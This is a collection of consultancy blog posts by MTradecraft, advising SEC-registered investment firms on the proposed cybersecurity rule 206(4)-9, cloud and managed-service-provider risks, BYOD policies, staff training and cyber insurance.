Top 5 Things SEC Registered Firms Need to Do to Prepare for the New Cybersecurity Regulations in 206(4)-9 | MTradecraft

With the new cybersecurity compliance regulation 206(4)-9 soon to be in effect, SEC registered financial firms have a lot to consider when it comes to their cybersecurity protocols.

These new regulations require them to protect customer information and data from unauthorized access or use, as well as prevent any malicious attacks on their systems. As such, many steps must be taken for these firms to ensure they remain compliant with this new regulation.

To help SEC CCO’s comply with this rule, here are five key steps they (or their cyber designee) should take:

1) Create strong passwords – Companies should make sure all employee passwords meet the requirements outlined by regulatory bodies like NIST or ISO27001/2 standards for password length and complexity. Moreover, regular checks should also be conducted on employee passwords so that weak ones can be identified quickly and replaced before hackers can exploit them.

2) Implement user authentication – Organizations should ensure that all users are authenticated before granting them access to any sensitive data. Multi-factor authentication is the gold standard when it comes to user authentication and should be implemented whenever possible.

3) Regular patching and updating – Outdated software can be a major security weak point for any organization. Therefore, companies must make sure all their software is regularly being patched and updated with the latest security patches.

4) Monitor suspicious activity – Companies should always monitor for any suspicious user activity or log-ins from unfamiliar IP addresses. Any such activities should be investigated immediately to prevent potential breaches.

5) Perform regular penetration tests or vulnerability scans – Penetration testing helps organizations identify potential vulnerabilities in their systems and networks that could be exploited by malicious actors. It is important for SEC registered firms to regularly conduct such tests to stay one step ahead of any potential attackers.

By following these best practices, SEC-registered financial firms can ensure they are fully compliant with 206(4)-9, as well as any other applicable regulations. Doing so will help them protect their customer data and information from cyber threats and ensure the safety of their business.

SEC Proposed Cybersecurity Rules – What They Are and What Our Clients Should be Doing Now

What new cybersecurity regulations did 2022 bring for SEC registered RIAs?

2022 was a very busy year for cybersecurity with the SEC. The Securities and Exchange Commission (SEC) released a series of proposed regulations that would significantly increase SEC oversight of public companies’ cybersecurity-related matters. The new rules call for greater transparency in how organizations operate with regard to their cyber security policies and procedures, decision-making processes, as well as an oversight role from the Board regarding all aspects related to cyber security.

The SEC’s unveiling of these guidelines indicates the heightened importance it places on cybersecurity. In fact, no other federal agency has taken such a firm stance in requiring public corporations and their Boards to uphold certain standards related to cybersecurity. One significant requirement is that companies must have Board oversight when reviewing, assessing, and enacting policies/procedures regarding cybersecurity matters. Additionally, all organizations must divulge any ‘material’ cyber incidents as well as provide follow-up information about them in an ongoing manner. Further, organizations will be required to start actively testing for vulnerabilities on their networks.

The comment period for the proposed rules concluded on May 9, 2022 with a flurry of comments being submitted. Organizations and their respective boards should prepare now due to the potentially drastic changes that may come into play once they are settled upon.

Those changes are expected to take effect Q1 2023.

What crucial requirements must be met once the new regulations are officially adopted?

If the SEC adopts rules similar to their proposed form, the key obligations include:

  • The SEC demands that you report any and all material cybersecurity incidents within a period of 4 days.
  • Actively and Proactively performing vulnerability scans and penetration tests on your firm’s network
  • Report any incidents that, when combined with other events, become noteworthy “as a whole”; (whatever that means)
  • Periodically disclose updates on previous incidents in SEC reports;
  • Describe the company’s cybersecurity risk management system
  • Elucidate how the Board supervises and manages cyber risk for their organization.
  • Disclose the Board members’ knowledge of cyber security.

What modifications are being made to the current regulations?

Companies and their senior management will be held to a much higher standard. The new regulations dictate that businesses must form suitable cybersecurity procedures, tell shareholders about these practices in public filings, reveal how the leading team oversees such programs efficiently, and report any cyber incidents in a manner that distributes sufficient information to investors.

If you have heard me speak in the past, one topic I always touch on is just how nebulous the SEC’s cybersecurity regulations can be. Hopefully, with the new regulations, the rules will be set in stone and more transparent than ever before; though they might come with a few extra obligations. Unfortunately, existing guidelines have made it difficult for companies to comprehend cybersecurity standards properly – but these forthcoming requirements should help rectify that issue substantially.

The SEC has made it clear that they expect more detailed and comprehensive documentation of cybersecurity threats, as well as timely incident reports and proof of proactive vulnerability audits.

What should your firm be doing?

If you have never performed a cybersecurity audit, now is the time. You simply cannot put it off any longer without being in violation. The SEC assumes you are doing audits and I assure you your clients expect you to be doing cybersecurity audits. I expect that the SEC will use the new regulations to rack noncompliant firms over the coals to make an example.

Because of that, companies should take proactive steps to review and revise their cybersecurity and risk management documents as soon as possible, taking into account any changes in technology infrastructure, mergers or acquisitions that may have occurred recently, an update of the threat landscape, and any lessons gleaned from security incidents. While these systems can take a while to refresh, beginning this process and producing that documentation now will ensure better protection against future threats.

To meet all the new regulations about board oversight, boards need to be fully educated and trained on their responsibilities concerning cybersecurity and risk management. To ensure that your board can effectively fulfill these duties, determine whether full or partial board decision-making will take charge of this task. Furthermore, guarantee that everyone involved has been properly briefed so they understand company policies and procedures before approving them. If you don’t have expertise on your board, you will need to hire an expert, such as MTradecraft, to fill that spot.

All companies must have an incident response plan in place. However, with the new proposed rules coming into effect shortly, we recommend you review and refresh your existing plans to ensure they are up-to-date. Your designated incident response team should be familiar with this timeline to help decide when it is necessary to escalate any significant or material incidents requiring senior leadership or Board approval. Without a clear escalation policy in place for such cases, your business could face consequences if left unprepared.

According to the SEC, organizations have just four days to report any material incident. This reporting window is shorter than other single U.S. law or regulation! To ensure that your Board of Directors are knowledgeable on how best to respond in an emergency and take necessary actions, they must be educated on an organization’s incident response plan and then participate in simulated exercises such as a tabletop exercise.

Establish precisely what materiality means for your organization. Senior leadership and legal staff should make the final call on whether an incident is deemed to be of sufficient importance that it needs to be reported within four days. When developing both the incident response plan and normal operating environment, ensure you have procedures in place which allow for rapid escalation to senior management or the legal team who will ultimately decide if something is considered ‘material’.

The new regulations are not going to be easy.

They will significantly change your operations and drastically cut into the budget of many firms. Unfortunately, you no longer have an option. The SEC doesn’t care if you are Goldman Sachs or Jim Bob Jones, “Work-From-Home-Financial-Planner”; cybersecurity is a requirement for everyone.

The Pros and (Mostly) Cons of RIAs Moving to the Cloud

The Pros and (Mostly) Cons of RIAs Moving to the Cloud

The “cloud” has revolutionized computing as we know it, providing SEC registered financial institutions with the ability to quickly deploy an online presence, scale as demand ebbs and flows, and provides the foundation for a remote workforce.

However, this convenience comes with its own set of challenges, and the race to “move to the cloud” has frequently left registered firms and their clients with an entirely new set of security challenges, data-privacy issues, and a significant regulatory compliance workload that they aren’t prepared to face. In this article, we will explore the pros and cons of moving to the cloud as an RIA.

These issues will be even more pronounced with the introduction of the SEC’s new cybersecurity regulation, 206(4)-9.

The Pros of Moving to the Cloud

There are many reasons why RIAs choose to move to the cloud. Perhaps the most appealing reason is the convenience factor. With the cloud, organizations can quickly deploy an online presence without having to invest in on-premises infrastructure. Additionally, the cloud provides organizations with the ability to scale as demand ebbs and flows. For example, during a pandemic when many employees are working remotely, a company may need to increase its cloud capacity to accommodate the influx of traffic.

Another advantage of moving to the cloud is that it can help organizations save money. With on-premises infrastructure, companies have to pay for hardware, software, maintenance, and energy costs. However, with cloud computing, these costs are often included in the monthly service fee. Additionally, because cloud providers frequently offer pay-as-you-go pricing models, companies only have to pay for the resources they use – making it a more cost-effective option in the long run.

The Cons of Moving to the Cloud

However, there are also some disadvantages of moving to the cloud that financial institutions need to be aware of before making the switch. One of the biggest lies ever told is that the cloud provides security. It doesn’t. When data is stored off-site on servers that are managed by a third-party provider, there is always a risk that sensitive information could be compromised. And cloud compromises happen frequently. Additionally, because cloud environments are often complex and dynamic (with multiple users accessing data from different locations), it can be difficult for IT teams to monitor for potential security threats. These cloud providers usually don’t bother checking for breaches/compromises proactively and in many cases, they won’t even tell their customers about notifications of these problems from external researchers.

What problems do I find most frequently when performing security audits for clients?

I have found countless VM images with unpatched vulnerabilities and some that contain malware or coin miners. Furthermore,

Cloud marketplaces are replete with pre-built VMs for customers to use, and while this is a convenient method, it often opens the door for an attack. These images can be outdated or have overly permissive firewall settings which make them an easy target. Another problem has been the introduction of VM images that come pre-installed with malware or crypto-currency miners.

While these attacks are threatening, they’re only the beginning in terms of what’s possible. An attacker that is properly motivated could create a VM image that would contact the malware operators and establish a command-and-control connection after a set amount of time has passed.

Furthermore, with the rise in hybrid-cloud deployments and point-to-point VPNs connecting cloud environments to a customer’s on-premises network, a vulnerability on a cloud VM could easily become a pathway to the heart of an organization’s network.

While cloud providers do scan VM images for malware before allowing them to be used, these scans only detect KNOWN and UNALTERED malicious code. This is not a complete defense against all threats and doesn’t protect from real-world threats. For example, a simple cron job on a Linux VM or scheduled task in Windows could easily download secondary payloads days or weeks after provisioning and never be detected.

Not only this, but cloud providers such as AWS often allow any user to share a VM image in the marketplace. Similar to the risk mobile app stores pose, using these types of VMs can have dangerous enterprise consequences if utilized.

Client privacy issues are a huge concern when moving to the cloud. Because data is stored off-site on servers that are managed by a third-party provider, there is always a risk that sensitive information could be accessed by unauthorized individuals. Cloud deployments are a frequent source of data leaks (S3 buckets, open databases, SQL servers ) for otherwise secure organizations.

Given that security is of utmost importance for the companies sustaining major clouds, such as Azure, AWS, Google Cloud Platform (GCP), etc., said companies have implemented extremely well-developed processes to secure their hypervisor layers. However, because these organizations provide infrastructure/platform/software solutions a majority of the work falls on the customer’s shoulders to secure their particular environment.

Lastly, most cloud providers collect broad swaths of user data (e.g., usage statistics and personal information) for either marketing efforts or third-party sales without users’ prior consent. This should cause anyone to pause about how our (and our client’s) sensitive information is being used and by whom, especially when it’s stored off-site on servers we don’t have control over.

Although cloud networking is not automatically insecure, organizations should understand that their security strategy for the cloud needs to be as strong as an on-premises environment. With the world moving towards a remote workforce operating in a hybrid or cloud-centric environment, these companies cannot believe that added security comes along when you are working with Seattle, Redmond or Bay Area tech giants.

There are both advantages and disadvantages to moving to the cloud, which organizations should weigh carefully before making a decision. Some benefits of moving to the cloud include convenience and cost savings, while some risks include data security threats associated with storing data off-site on servers managed by a third party.

If you do decide to go to the cloud, make sure your are comparing your configuration settings against a known benchmark, such as the CIS AWS Foundations Security Benchmark.

Need help auditing your cloud environments? MTradecraft can help. We are not affiliated with any cloud services which allows us to act as a true consultant to our clients.

The Dangers of MSPs for SEC and FINRA Registered Firms

The Dangers of Managed IT Service Providers (MSPs) for SEC-registered Firms.

(And Knowing When to RUN away from them)

There is a conflict of interest between every MSP and their clients which makes MSPs an insider threat to every SEC or FINRA registered firm’s processes and systems. They have unrestricted access to a client’s network and systems, which gives them the ability to do serious damage if they are not properly supervised.

In this blog post, I will explore the dangers of MSPs, how to audit their work, and how to protect your firm from them. While I am not saying every MSP is like this, I will say that the vast majority I have encountered within my 200+ cyber audits are.

So what is the big problem?

The goals of the MSP and their clients never align.

In the cybersecurity world, there is a very real balance between “security” and “convenience”. The more secure a system is, the less convenient its usage. And Vice-Versa.

The goal of every MSP is to deliver templated technology solutions (or a package of solutions) to as many clients as possible. The MSP is generally going to err on the side of convenience when deploying these packages because that decreases the MSPs workload both in implementation and support. When they err on the side of convenience they neglect security and leave vulnerabilities open across the client’s network.

The goal of the client (the SEC or FINRA registered firm) is Security and having the MSP provide that security is often in direct conflict with the MSP’s ability to conveniently deliver their solutions.

Thus, their goals in the service never align.

Here are some of the problems I think need to be discussed in the industry right now as the SEC continues to roll out the new cybersecurity regulations known as 206(4)-9.

To start, every firm should understand that solutions also come with problems. While hiring an MSP may help your IT department’s workload, it adds significant complexity to the Compliance department’s workload.

Here are the issues:

MSPs Have Unrestricted Access to Your Network and are frequent targets of attack:

MSPs have full access to your network and systems. This includes all of your data, applications, and devices. They also can make changes to your system configurations. This level of access makes MSPs a prime target for cyber criminals. If an MSP employee is compromised, the attacker can gain full access to your network and systems. This could allow them to steal sensitive data, install malicious software, or even shut down your entire network. Do you trust your MSP to report this breach to you? Don’t. They won’t. An MSP reporting a breach to you would cause reputation risk, revenue loss, as well as potential litigation.

MSP Employees Are Not Properly Supervised

MSP employees are not always properly supervised. This means that they may not be following proper security procedures when working on your network and systems. Additionally, MSP employees may not be properly trained in cybersecurity best practices. This could lead to them making mistakes that could put your firm at risk. For example, an MSP employee could accidentally delete critical files or fail to apply security patches in a timely manner.

How to Protect Your Firm from MSP Insider Threats

There are several steps that you can take to protect your firm from MSP insider threats:

1. Vet Your MSP: Be sure to thoroughly vet your MSP before giving them access to your network and systems. Make sure that they have a good reputation and that their employees are properly trained in cybersecurity best practices. Ask to see third-party audit reports. If they don’t have them this firm is not your friend. Your MSP should already have these reports and be proud to share these reports with you. If they aren’t, something is very wrong and the MSP is not working in your best interest.

2. Monitor Your Network: Be sure to self-monitor your network for any suspicious activity. This includes monitoring for unauthorized changes to system configurations and unusual patterns of data usage. During an examination, the SEC will want to see where you are verifying the MSPs security duties.

3. Restrict Access: Be sure only to give MSP employees the minimum amount of access necessary to perform their job duties. Do not give them any unnecessary privileges that could potentially be abused. When they request access to a system, ask the MSP to submit the request in writing to explain why they need access to those systems. Also ask the MSP to submit reports of which employees have access to your systems and what level of access they have. This all needs to be documented for the SEC and FINRA.

4. Educate Your Employees: Be sure to educate your employees about the dangers of working with unsecured networks and systems. Make sure that they know how to spot suspicious activity and what steps to take if they believe that their account has been compromised. If you have less than 11 employees, you can implement the FieldCraft cybersecurity awareness training program for free. [ ]

5 . Implement Multi-Factor Authentication: Be sure the MSP implements multi-factor authentication for all user accounts, including accounts used by MSP employees. This will help reduce the risk of attackers gaining access to your network if an employee’s credentials are compromised. Oftentimes, MSPs do not use MFA because it adds to the time and complexity of their workload. Having MFA solves 99% of cybersecurity problems. If your MSP does not implement MFA by default….RUN.

By taking these steps, you can help protect your firm from the dangers of MSP insider threats.

In conclusion, many firms think hiring an MSP solves all their IT problems. While it does solve IT problems, it adds significant work to the Compliance department and to the CISO. It is important to be aware of the dangers of MSP insider threats and take steps to protect your firm from them.

By thoroughly vetting your MSP, monitoring your network, restricting employee access, educating your employees, and implementing multi-factor authentication, you can help reduce the risk of an attack on your firm.

Of course, if you need help with any of this work, MTradecraft would love to assist.

(To be clear, we don’t sell MSP services. We just do the audits.)

Why Cybersecurity Awareness Training is Important for SEC Registered Firms

Earlier this year, the SEC announced Rule 206(4)-9 as part of their sweeping overhaul of cybersecurity regulations. We are moving from a period where the SEC provided cybersecurity “guidance” to a period of cybersecurity “regulation”.

One of these proposed rules will require that firms must provide cybersecurity awareness training to their employees on an annual basis. Providing cybersecurity awareness training is the second most important cybersecurity tip we can offer. (Use 2FA on all accounts, is the first)

In order to understand why cybersecurity awareness training is so important, it’s first necessary to understand what cyberattacks are and how they work. A cyberattack is any type of attack that is carried out using electronic means. These attacks can take many different forms, but they all have one thing in common: they exploit vulnerabilities in order to gain access to sensitive information or systems.

The most common type of cyberattack is a phishing attack. Phishing attacks use emails or other communications that look legitimate in order to trick the recipient into giving up sensitive information, such as login credentials or financial information. Once the attacker has this information, they can use it to gain access to systems or steal money.

Another common type of attack is a malware attack.

Malware is short for malicious software, and it refers to any software that is designed to harm a computer system. Malware can be used to disable systems, delete files, run up toll charges, or even steal information. One of the most famous examples of malware is the WannaCry ransomware attack, which infected millions of computers around the world and caused billions of dollars in damage.

These are just two examples of the many different types of cyberattacks that exist. It’s important for businesses to be aware of all the different types of attacks that exist so that they can be better prepared to defend against them. This is where cybersecurity awareness training comes in.

MTradecraft provides this training to our clients through our FieldCraft platform. FieldCraft provides employees with the knowledge they need to identify and defend against common cyberattacks and tests their skills with real world simulations.

When employees are trained in cybersecurity best practices, they are better equipped to spot attacks when they occur and take steps to prevent them from happening in the first place. Cybersecurity awareness training can also help businesses create a culture of security within their organization, which can further reduce the risk of an attack occurring in the first place.

The SEC’s proposal for mandatory cybersecurity awareness training is a step in the right direction towards protecting registered firms from cyber threats. By teaching employees about common attacks and how to defend against them, firms can significantly reduce their risk of being breached. In addition, creating a culture of security within an organization can help further reduce the risk of an attack occurring in the first place. All SEC and FINRA registered firms should take this rule seriously and implement mandatory cybersecurity awareness training for their employees as soon as possible.

The U.S. Securities and Exchange Commission (SEC) announced charges against 18 individuals that used hacked brokerage accounts to trade stocks and launder money.

A few days ago, the SEC announced charges against 18 defendants in an international scheme to manipulate stocks using hacked US brokerage accounts.

In February of 2021, I hosted a webinar where we simulated a cyber attack on a hedge fund to show how hackers could potentially compromise brokerage accounts and make money in micro-caps by counter-trading the buy-orders stemming from the hacked accounts.

Below is a recording of that webinar if you are interested in understanding the mechanics of how this attack might have been conducted:

The SEC’s complaint alleges that hackers accessed at least 31 US retail brokerage accounts in late 2017 and early 2018, using them to purchase the securities of Lotus Bio-Technology Development Corp. and Good Gaming, Inc.

The illegal purchases allowed con-artists, who already had a lot of Lotus Bio-Tech and Good Gaming stock, to sell their inventory at higher than normal prices and make more than $1 million in illicit proceeds.

According to the complaint, Davies Wong of British Columbia, Canada, and Glenn B. Laken of Illinois controlled the majority of the Lotus Bio-Tech and Good Gaming stock that was sold while Mohamed coordinated with Wong, Laken, and others to illegally carry out online attacks to artificially manipulate market prices.The complaint claims that Richard Tang of British Columbia, Canada, was a member of both the Lotus Bio-Tech and Good Gaming frauds.

7 Steps to Compliant and Effective SEC Cybersecurity Operations

The SEC has released new regulations on cybersecurity practices for registered firms. These regulations are collectively known as 206(4)-9 In this blog post, we’ll .outline the seven steps your firm needs to take to strengthen its cybersecurity posture and meet the expectations of regulators.

  1. Establish a Board-Level Cybersecurity Oversight Function
    The first step is to establish a board-level cybersecurity oversight function. This doesn’t mean creating a new board committee devoted solely to cybersecurity (although that’s an option). Instead, it means assigning responsibility for cybersecurity governance to an existing board committee, such as the audit committee, and ensuring that the committee receives regular updates on the state of your company’s cybersecurity program.
  2. Conduct a Risk Assessment
    Your second step is to conduct a risk assessment to identify the specific cyber risks and threats facing your company. There are many different frameworks you can use for this purpose, but the SEC wants you to use the NIST Cybersecurity Framework because it’s well-recognized and widely used. Once you’ve identified your company’s specific risks, you can develop appropriate mitigation strategies.
  3. Develop a Cyber Incident Response Plan
    Your third step is to develop a cyber incident response plan. This should include both technical and non-technical components, and it should be regularly tested and updated. The plan should be tailored to your company’s specific risks and needs, but it should at least address communication protocols, data backup and recovery procedures, and employee training. Some firm’s include this as part of the firm’s overall BCP (Business Continuity Plan) while others draft a separate document to cover cyber related incidents.
  4. Implement Access Control Measures
    Your fourth step is to implement access control measures to restrict access to sensitive information on a need-to-know basis. This includes both physical and logical access controls, such as user authentication requirements (e.g., strong passwords) and least privilege principles (e.g., granting employees access only to the information they need to do their jobs).
  5. Implement Data Loss Prevention Measures
    Your fifth step is to implement data loss prevention (DLP) measures. DLP refers to any measure taken to prevent sensitive data from leaving your company’s network without authorization. This might include encrypting data in transit, implementing comprehensive activity logging, or deploying DLP software solutions.
  6. Train Employees on Cybersecurity Procedures
    Your sixth step is training employees on security procedures—including both technical procedures (e..g., how to spot phishing emails) and non-technical procedures (e..g., what to do if they suspect they’ve been breached). Employee training should be ongoing and should account for changes in threats over time.
  7. Monitor Your Network for Suspicious Activity
    Your seventh and final step is continuous monitoring of your network for suspicious activity using both automated tools (e.g., intrusion detection systems) and manual processes (e.g., periodic reviews of system logs and vulnerability scans). This will help you detect malicious activity quickly so you can take steps to contain any damage caused by a breach.

Following these seven steps will help your firm achieve compliance with the SEC regulations on cybersecurity—and make your organization more secure in the process! If you need assistance implementing any of these steps, MTradecraft would be happy to help!

Webinar Recording: A Discussion on BYOD Policies at SEC Registered Firms.

In this webinar we discuss the dangers of Bring Your Own Device (BYOD) policies for SEC registered firms. BYOD policies can be a major security risk for firms as they open up the possibility for sensitive data to be accessed and stolen by malicious actors.

I’m not here to sell you a solution. There isn’t one. This is just the opinion of someone who has worn the CCO and COO hat for years, and now works as an ethical hacker having performed over 200 security audits and penetration tests against SEC registered firms.

Bring Your Own Device Policies are a Total Nightmare for SEC Registered Firms

Allowing employees to use their own personal devices for work is a stupid idea for all SEC registered firms.

I’m not here to sell you a solution. There isn’t one. This is just the opinion of someone who has worn the CCO and COO hat for years, and now works as an ethical hacker having performed over 200 security audits and penetration tests against SEC registered firms.

TLDR: Do not allow a BYOD policy at your firm.

The first thing I hear from CCO’s is “But our MSP (Managed Service Provider) has set up a MDM (Mobile Device Management) solution.”

My answer is always, “No, your MSP sold you on an MDM solution that doesn’t solve your compliance obligations.”

MDM software can help with most of the issues below, but I have yet to see one that is cut out to pull the compliance requirements of SEC-registered firms in a compliant way. For you legal nerds out there, we are looking at Advisers Act Rule 204-2 (Books and Records Rule) and 206(4)-7 (Compliance Rule) in terms of maintaining compliant communications records. 206(4)-9 will also touch on this when it hits the books April 2023.

If your SEC-registered firm decides to allow employees to use their personal mobile devices for work purposes, you should be aware of the following risks:

1. Data theft

If you allow your personnel to use their own devices unchecked, likely, some of the personal programs they use will not be as stringent with security standards. An account they have for personal usage may eventually lead to corporate data and sensitive information being revealed if it is hacked.

2. Malware

Employees use personal devices to download various types of information and files, such as PDF, applications, and um….Porn. Corporate data security is at risk if employees aren’t able to discern between work-related and personal data. Games and porn downloaded or viewed with mobile devices are often associated with hidden viruses or malware, for example. If an employee logs into the company network from their infected device, the entire system could be jeopardized by passing along the malware to work systems.

3. Legal problems

A business’s reputation may be destroyed in the event of a security breach. If an employee-owned device results in a leak or breach of corporate data, this might result in serious consequences, such as potential litigation.

Working with legal counsel to develop sound policies is crucial for protecting your organization from costly and potentially devastating lawsuits, especially if you decide to allow a BYOD policy.

4. Lost or stolen devices

The best-case situation is that a worker’s device gets stolen or goes missing, and this is inconvenient. In the worst-case scenario, you’re dealing with a catastrophic disaster. Loss or theft of the employee’s device might result in a major breach if they weren’t following corporate security standards when using it. For example, the employee may store their passwords (both personal and business) in an unsecured notes program, making it easy for someone who obtains the device to breach corporate accounts.

Even if the employee followed the policy to the letter, hacking/cracking technology has advanced so much in recent years that a strong password or fingerprint verification may not be enough to keep them out of the device. Mobile device management (MDM) software might help businesses solve this issue by allowing them to remotely erase devices so hackers don’t have a chance to steal sensitive data. On the other hand, MDM software is extremely invasive to an employees privacy (See #8)

5. Improper mobile management

A staff member leaving an organization creates a potential security vulnerability if they still have access to company data on their personal mobile devices. To prevent an employee from continuing to access systems or apps after they leave the company, companies must be able to reset passwords and revoke access immediately. If a security breach does occur, tracking down the device responsible should also be possible. If you just fired an employee, do you think they would be willing to cooperate? Hell no.

6. Insufficient employee training

Many security breaches are caused by carelessness or human error. Most of the time, this occurs when an employee is unaware of their company’s policy on security, especially regarding devices. When you’re training employees in device security, think about the best way to communicate the information to them. If you need a training program, I highly recommend you check out free training program called FieldCraft. It is compliant with SEC and FINRA regulations and we offer a no BS-attached free version available to firms with less than 10 employees.

7. Shadow IT

Shadow IT is where company employees use technology that is not approved or managed by the company’s IT department, and it is becoming a big problem in many businesses. When employees bring in consumer-grade technologies and goods without the supervision or management of their IT department or MSP, a slew of issues can result. Any software or hardware an employee introduces without your review or approval poses a potential hazard, whether it’s a USB drive with potential malware on it or an open-source program with low-security standards.

8. Invasion of Privacy

If you are an SEC-registered business, you must keep track and record all communications with clients. If you allow your employees to text message your clients, you must monitor all of their text message conversations. There is no automated method for telling whether an employee’s text message communication is intended for a friend or family member vs a client. As a result, you must keep track of them all. No, thanks.

Your Cybersecurity Insurance is Absolutely Worthless…and it will get worse.

To be clear, I am not trying to sell you a policy. I don’t sell policies. And, I don’t have a recommendation for a policy. I don’t have a solution for you because every policy I have seen is worthless.

Which is why I always say….

“Your cybersecurity insurance policy is absolutely worthless, but I would never want to go through an SEC audit or examination without one”.

This is a line I have been towing for years. I have covered the topic in several webinars. A recording of the latest is below.

Now, it is going to get worse…

Starting 31 March 2023, insurance companies will require all standalone cyber attack policies to include a clause excluding liability for losses arising from state-backed cyber attacks. This is in addition to the “war” clause that already exists and is so problematic.

The new clause will exclude any losses due to a war–declared or not–even if the policy has a separate war exclusion. In addition, it must also exclude any losses arising from state-sponsored cyberattacks that disable a firm’s ability to function properly.

Furthermore, the contracts will now have a stipulation on whether cover excludes IT systems not located in the country “under attack”, and it should set a clear standard for how the involved parties will reach an agreement if any state-sponsored cyberattack originates from one or more countries.

The evolving risk of cyber-related business was noted by one firm, Lloyd’s. They warn that if not managed properly, it could lead to significant losses for syndicates that would be difficult to recover from.

“The ability of hostile actors to easily disseminate an attack, the ability for harmful code to spread, and the critical dependency that societies have on their IT infrastructure, including to operate physical assets, means that losses have the potential to greatly exceed what the insurance market is able to absorb,” Lloyd’s added.

MTradecraft agrees. Especially considering that a large majority of FinTech providers have a widespread and little to no cybersecurity budget.

Lloyd’s stated that it is aware many managing agents already have clauses specifically excluding war and non-war state-sponsored cyber-attacks, but they need to be of a high standard with solid wordings.

“We consider the complexities that can arise from cyber-attack exposures in the context of war or non-war, state-backed attacks means that underwriters should ensure that their wordings are legally reviewed to ensure they are sufficiently robust,” said Lloyd’s.

Starting March 31, 2023, this new requirement will go into effect for every policy–both at its inception and renewal.  Note, that this coincides with the SEC’s new cyber regulations known as 206(4)-9.

So again, please understand your cybersecurity policy is worthless. Unfortunately, the SEC and your clients expect you to have coverage.

Your only defense is to do your required cyber audits (SEC 206(4)-9) so that you patch systems, plug open ports, train your employees, and manage your vulnerabilities before they are discovered by malicious hackers…or your insurance company.